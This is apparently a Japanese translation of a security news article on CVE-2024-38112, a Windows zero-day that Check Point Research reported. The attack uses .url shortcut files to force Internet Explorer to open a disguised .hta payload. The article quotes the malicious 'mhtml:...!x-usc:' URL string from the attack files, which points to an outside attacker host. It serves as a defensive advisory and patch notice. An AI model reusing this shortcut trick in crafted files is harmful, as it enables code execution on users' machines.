Check Point Research Details 0-Day Flaw (CVE-2024-38112), Threatens Windows Users
2024/07/09 SecurityOnline — 無害に見える Windows Internet Shortcut ファイル (.url) を武器にして、無防備なユーザーを狙う新たなゼロデイ攻撃を、Check Point Research のサイバーセキュリティ研究者たちが発見した。この、脆弱性 CVE-2024-38112 を悪用する巧妙な攻撃は、長らく使われていなかった Internet Explorer (IE) ブラウザを復活させことで、最新の Windows 10/11 の OS 上であっても、悪意のコードを実行させる可能性を持つものだ。
攻撃者たちが悪用するのは、Web サイトへのショートカットとして使用される、一般的な “.url” ファイルである。ただし、この攻撃では、セキュリティ上の欠陥が十分に文書化さ、Microsoft がサポート終了したブラウザである、Internet Explorer を呼び出すような細工が施されている。脅威アクターたちは、URL 文字列で “mhtml” というトリックを巧妙に使い、悪意の意図を偽装している。
Image: Check Point
この手法は、まったく新しいものではない。Word 文書内で同様の文字列を用いて、脆弱性 CVE-2021-40444 を悪用する、以前のゼロデイ攻撃で使用された手法を継承している。この場合の “.url” ファイルには、以下のものが含まれている:
mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html
この独特なフォーマットはシステムを欺き、Edge などの安全なブラウザではなく、IE により URL を開かせる。この手法は、遅くとも 2023年1月から用いられ、最新のサンプルは 2024年5月13日に観測されている。
Image: Check Point
IE が起動すると、この古い Web ブラウザーのセキュリティ機能が悪用される。さらに攻撃者は、悪意の “.hta” (HTML アプリケーション) ファイルを PDF として隠し持つ手口を用いて、セキュリティ警告を回避し、被害者のコンピュータ上で有害なコードを実行させる。
この、IEMO を悪用する新たなゼロデイ脆弱性 CVE-2024-38112 は、Microsoft の July 2024 Patch Tuesday で対処されている。Windows ユーザーに強く推奨されるのは、このパッチを直ちに適用して、システムを保護することだ。さらに、信頼できないソースからの “.url” ファイルに対する警戒が、きわめて重要になる。この攻撃ベクターが成功する前提として、いくつかのユーザーとのやり取りが必要だが、意識と注意により悪用を防ぐことは可能である。
Microsoft の July 2024 Patch Tuesday は、142件の脆弱性に対処するものであり、その中には4件の深刻な脆弱性が含まれる。この記事で紹介した CVE-2024-38112 に加えて、積極的に悪用されている3件のゼロデイ脆弱性 (CVE-2024-38080/CVE-2024-35264/CVE-2024-37985) にも、Microsoft は対処している。
技術的な詳細については、Check Point Research の公式ブログを参照してほしい。
もう、何年も Windows を触っていないので、IE の扱いがわかりませんが、OS のインストール・イメージに、取り込まれているのでしょうか? もし、そうだとすると、この攻撃手法は効果を発揮しそうですね。それにしても、いろんな手口を思いつくものです。よろしければ、Windows で検索も、ご利用ください。
CISA KEV:July 09 2024:CVE-2024-38112:Windows MSHTML
IoT OT Security News 
You must be logged in to post a comment.